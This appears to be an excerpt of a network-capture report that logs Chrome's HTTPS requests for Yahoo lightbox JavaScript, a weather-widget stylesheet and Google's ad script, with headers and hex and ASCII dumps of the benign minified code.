                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 74 68 69 73 2e 5f 75 74 69 6c 2e 74 72 69 67 67 65 72 26 26 74 68 69 73 2e 6f 70 65 6e 28 29 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 54 6f 75 63 68 53 74 61 72 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 5f 73 74 61 74 65 2e 74 6f 75 63 68 73 74 61 72 74 59 3d 65 2e 63 68 61 6e 67 65 64 54 6f 75 63 68 65 73 5b 30 5d 2e 73 63 72 65 65 6e 59 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 54 6f 75 63 68 4d 6f 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6f 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 77 72 61 70 70 65 72 4d 61 70 2c 6c 3d 6f 2e 65 6c 65 6d 65 6e 74 54 6f 53 63 72 6f 6c 6c 3b 69 66 28 30 3d 3d 3d 6c 2e 73 63 72 6f 6c 6c 54 6f 70 29 7b 76 61 72 20 72 3d 65 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: this._util.trigger&&this.open())}},{key:"handleTouchStart",value:function(e){this._state.touchstartY=e.changedTouches[0].screenY}},{key:"handleTouchMove",value:function(e){var t=this,o=this._util.wrapperMap,l=o.elementToScroll;if(0===l.scrollTop){var r=e.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 74 3d 65 2e 62 6f 75 6e 64 61 72 79 2c 6f 3d 65 2e 65 6c 65 6d 2c 6e 3d 65 2e 74 61 72 67 65 74 2c 6c 3d 65 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 75 74 69 6c 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 3d 6c 7c 7c 6e 26 26 5f 28 28 74 26 26 76 28 6f 2c 74 29 7c 7c 4d 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 29 29 2c 74 68 69 73 2e 5f 75 74 69 6c 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 7d 7d 5d 29 2c 74 7d 28 79 29 3b 41 2e 65 76 65 6e 74 73 3d 7b 63 6c 69 63 6b 3a 5b 5b 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 2c 22 68 61 6e 64 6c 65 43 6c 69 63 6b 22 5d 5d 7d 3b 76 61 72 20 50 3d 41 2c 59 3d 4f 62 6a 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,get:function(){var e=this._util,t=e.boundary,o=e.elem,n=e.target,l=e.templateText;return this._util.templateText=l||n&&_((t&&v(o,t)||M).querySelector(n)),this._util.templateText}}]),t}(y);A.events={click:[["wafer-lightbox","handleClick"]]};var P=A,Y=Obje
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 62 69 6e 64 45 76 65 6e 74 2c 58 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 62 61 73 65 2c 7a 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 73 2e 57 61 66 65 72 42 61 73 65 43 6f 6e 74 72 6f 6c 6c 65 72 2c 47 3d 64 6f 63 75 6d 65 6e 74 2c 51 3d 47 2e 62 6f 64 79 2c 5a 3d 47 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 24 3d 22 73 63 72 6f 6c 6c 22 3d 3d 3d 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 76 65 72 66 6c 6f 77 59 3f 51 3a 5a 2c 65 65 3d 76 6f 69 64 20 30 2c 74 65 3d 76 6f 69 64 20 30 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: bindEvent,X=window.wafer.base,z=window.wafer.controllers.WaferBaseController,G=document,Q=G.body,Z=G.documentElement,$="scroll"===window.getComputedStyle(document.body).overflowY?Q:Z,ee=void 0,te=void 0,oe=function(e){function t(){var e=arguments.length>0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 2c 7b 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 7d 29 29 2c 79 2e 5f 73 74 61 74 65 2e 6c 61 73 74 53 63 72 6f 6c 6c 59 3d 65 2c 79 2e 5f 73 74 61 74 65 2e 63 75 72 72 65 6e 74 49 6e 73 74 61 6e 63 65 3d 74 68 69 73 2c 79 2e 5f 73 74 61 74 65 2e 6f 70 65 6e 3d 21 30 7d 2c 50 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 6e 64 6c 65 53 77 69 70 65 43 6c 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 79 2e 5f 63 6c 6f 73 65 28 7b 73 6f 75 72 63 65 3a 22 73 77 69 70 65 43 6c 6f 73 65 22 7d 29 7d 2c 62 2e 5f 72 65 6e 64 65 72 4c 69 67 68 74 42 6f 78 57 72 61 70 70 65 72 28 29 2c 62 2e 73 79 6e 63 28 29 2c 62 7d 72 65 74 75 72 6e 20 63 28 74 2c 65 29 2c 42 28 74 2c 5b 7b 6b 65 79 3a 22 5f 63 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,{overflow:"hidden"})),y._state.lastScrollY=e,y._state.currentInstance=this,y._state.open=!0},P.prototype.handleSwipeClose=function(){y._close({source:"swipeClose"})},b._renderLightBoxWrapper(),b.sync(),b}return c(t,e),B(t,[{key:"_close",value:function(){
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 65 6e 74 28 22 6c 69 67 68 74 62 6f 78 3a 63 6c 6f 73 65 22 2c 7b 65 6c 65 6d 3a 69 2c 6d 65 74 61 3a 7b 73 6f 75 72 63 65 3a 6e 2c 74 61 72 67 65 74 45 6c 65 6d 3a 66 7d 7d 29 7d 2c 70 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 43 6c 6f 73 65 43 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 5f 63 6c 6f 73 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 42 67 43 6c 6f 73 65 43 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2e 70 72 6f 70 73 2e 77 72 61 70 70 65 72 4d 61 70 2c 6f 3d 74 2e 77 72 61 70 70 65 72 45 6c 65 6d 3b 65 2e 74 61 72 67 65 74 3d 3d 3d 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ent("lightbox:close",{elem:i,meta:{source:n,targetElem:f}})},p)}}},{key:"_handleCloseClick",value:function(e){e.preventDefault(),this._close()}},{key:"_handleBgCloseClick",value:function(e){var t=this._options.props.wrapperMap,o=t.wrapperElem;e.target===o


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    142192.168.2.44990687.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC603OUTGET /aaq/fp/css/react-wafer-weather.common.desktop.a03361886464b469acd3a16cfbd022ed.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC761INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: 3mvCYovpT7T6a1iaPbfWL4geVuoGt7scCpF25xo4Tx0X7Syp3g00/rW2thmre15QpOmOMmmyOSJtpC2az0e3eXIBynJyILyFGGLn5Ja/U00=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: RTR6VDJZBGW3Z1GS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Thu, 26 Sep 2024 12:57:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 03 Aug 2022 09:53:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "a03361886464b469acd3a16cfbd022ed"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: vYBRHK1nkH1zZI3a6Ga3.sb6tkLNfuQZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 3735
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 361430
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 74 72 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: @-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@keyframes spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(360deg);tra
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 64 65 72 2d 77 69 64 74 68 3a 30 20 30 20 31 70 78 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 63 6f 6f 74 65 72 29 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 36 70 78 20 36 70 78 20 30 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 77 61 66 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 73 61 76 65 64 2d 69 74 65 6d 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: der-width:0 0 1px;color:var(--scooter);line-height:18px;overflow:hidden;padding:6px 6px 6px 0;text-overflow:ellipsis;white-space:nowrap}.wafer-autocomplete-saved-item{white-space:normal;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-alig
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1135INData Raw: 6e 20 2e 77 61 66 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 69 74 65 6d 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 6e 6f 2d 77 72 61 70 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 23 6c 6f 63 6b 65 72 57 65 61 74 68 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 73 75 67 67 65 73 74 69 6f 6e 73 20 2e 77 61 66 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 69 74 65 6d 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 36 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 36 70 78 7d 23 67 72 69 64 2d 6c 61 79 6f 75 74 20 2e 77 61 66 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 69 74 65 6d 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 74 63 61 76 65 29 3b 62 6f 72 64 65 72 3a 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: n .wafer-autocomplete-item{display:flex;flex-wrap:no-wrap;justify-content:space-between}#lockerWeather-autocomplete-suggestions .wafer-autocomplete-item{padding-top:6px;padding-bottom:6px}#grid-layout .wafer-autocomplete-item{color:var(--batcave);border:0


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    143192.168.2.449913216.58.206.664434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC501OUTGET /pagead/managed/js/gpt/m202409240101/pubads_impl.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: securepubads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC746INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 489606
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:46:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: Tue, 30 Sep 2025 16:46:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 2086
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: 11534241471022370290
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=ISO-8859-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC644INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 2d 32 30 31 38 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 2e 2c 20 4e 65 74 66 6c 69 78 2c 20 49 6e 63 2e 2c 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 2e 20 61 6e 64 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (function(_){/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ /* Copyright Google LLC SPDX-License-Identifier: Apache-2.0 */ /* Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1390INData Raw: 41 4e 54 49 45 53 20 4f 52 20 43 4f 4e 44 49 54 49 4f 4e 53 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 65 69 74 68 65 72 20 65 78 70 72 65 73 73 20 6f 72 20 69 6d 70 6c 69 65 64 2e 20 0a 20 53 65 65 20 74 68 65 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 74 68 65 20 73 70 65 63 69 66 69 63 20 6c 61 6e 67 75 61 67 65 20 67 6f 76 65 72 6e 69 6e 67 20 70 65 72 6d 69 73 73 69 6f 6e 73 20 61 6e 64 20 0a 20 6c 69 6d 69 74 61 74 69 6f 6e 73 20 75 6e 64 65 72 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 4d 61 74 68 2e 75 75 69 64 2e 6a 73 20 28 76 31 2e 34 29 20 0a 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 6f 6f 66 61 2e 63 6f 6d 20 0a 6d 61 69 6c 74 6f 3a 72 6f 62 65 72 74 40 62 72 6f 6f 66 61 2e 63 6f 6d 20 0a 43 6f 70 79 72 69 67 68 74 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ /* Math.uuid.js (v1.4) http://www.broofa.com mailto:robert@broofa.com Copyright
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1390INData Raw: 6f 2c 74 6f 2c 77 6f 2c 79 6f 2c 7a 6f 2c 41 6f 2c 42 6f 2c 44 6f 2c 46 6f 2c 47 6f 2c 49 6f 2c 4a 6f 2c 4b 6f 2c 4c 6f 2c 4d 6f 2c 4f 6f 2c 54 6f 2c 56 6f 2c 64 70 2c 66 70 2c 68 70 2c 6b 70 2c 6a 70 2c 69 70 2c 77 70 2c 7a 70 2c 48 70 2c 49 70 2c 4b 70 2c 4c 70 2c 4d 70 2c 4f 70 2c 50 70 2c 52 70 2c 53 70 2c 54 70 2c 56 70 2c 57 70 2c 59 70 2c 58 70 2c 24 70 2c 63 71 2c 62 71 2c 64 71 2c 66 71 2c 67 71 2c 6a 71 2c 6b 71 2c 6c 71 2c 6f 71 2c 72 71 2c 71 71 2c 74 71 2c 75 71 2c 76 71 2c 42 71 2c 43 71 2c 45 71 2c 47 71 2c 48 71 2c 4a 71 2c 49 71 2c 4d 71 2c 50 71 2c 52 71 2c 55 71 2c 57 71 2c 62 72 2c 65 72 2c 66 72 2c 6e 72 2c 72 72 2c 75 72 2c 73 72 2c 74 72 2c 79 72 2c 7a 72 2c 42 72 2c 43 72 2c 44 72 2c 45 72 2c 48 72 2c 49 72 2c 4a 72 2c 4b 72 2c 4c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: o,to,wo,yo,zo,Ao,Bo,Do,Fo,Go,Io,Jo,Ko,Lo,Mo,Oo,To,Vo,dp,fp,hp,kp,jp,ip,wp,zp,Hp,Ip,Kp,Lp,Mp,Op,Pp,Rp,Sp,Tp,Vp,Wp,Yp,Xp,$p,cq,bq,dq,fq,gq,jq,kq,lq,oq,rq,qq,tq,uq,vq,Bq,Cq,Eq,Gq,Hq,Jq,Iq,Mq,Pq,Rq,Uq,Wq,br,er,fr,nr,rr,ur,sr,tr,yr,zr,Br,Cr,Dr,Er,Hr,Ir,Jr,Kr,L
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1390INData Raw: 28 22 43 68 72 6f 6d 65 22 29 7c 7c 5f 2e 6a 61 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 5f 2e 6d 61 28 29 3f 30 3a 5f 2e 6a 61 28 22 45 64 67 65 22 29 29 7c 7c 5f 2e 6a 61 28 22 53 69 6c 6b 22 29 7d 3b 5f 2e 73 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 6a 61 28 22 41 6e 64 72 6f 69 64 22 29 26 26 21 28 5f 2e 71 61 28 29 7c 7c 5f 2e 70 61 28 29 7c 7c 5f 2e 6e 61 28 29 7c 7c 5f 2e 6a 61 28 22 53 69 6c 6b 22 29 29 7d 3b 76 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 75 61 3d 3d 3d 76 6f 69 64 20 30 26 26 28 75 61 3d 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 75 61 7d 3b 78 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 76 61 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 77 61 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ("Chrome")||_.ja("CriOS"))&&!(_.ma()?0:_.ja("Edge"))||_.ja("Silk")};_.sa=function(){return _.ja("Android")&&!(_.qa()||_.pa()||_.na()||_.ja("Silk"))};va=function(){ua===void 0&&(ua=null);return ua};xa=function(a){var b=va();return new _.wa(b?b.createScript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1390INData Raw: 6f 6e 63 65 22 2c 62 29 7d 3b 54 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 73 72 63 3d 5f 2e 79 61 28 62 29 3b 53 61 28 61 29 7d 3b 5f 2e 56 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 55 61 29 72 65 74 75 72 6e 20 61 2e 67 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 22 29 3b 7d 3b 58 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 5f 2e 57 61 28 61 2c 62 29 3b 76 61 72 20 63 3b 28 63 3d 62 3e 3d 30 29 26 26 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 63 65 2e 63 61 6c 6c 28 61 2c 62 2c 31 29 3b 72 65 74 75 72 6e 20 63 7d 3b 5f 2e 59 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 3e 30 29 7b 66 6f 72 28 76 61 72 20 63 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: once",b)};Ta=function(a,b){a.src=_.ya(b);Sa(a)};_.Va=function(a){if(a instanceof _.Ua)return a.g;throw Error("");};Xa=function(a,b){b=_.Wa(a,b);var c;(c=b>=0)&&Array.prototype.splice.call(a,b,1);return c};_.Ya=function(a){var b=a.length;if(b>0){for(var c=
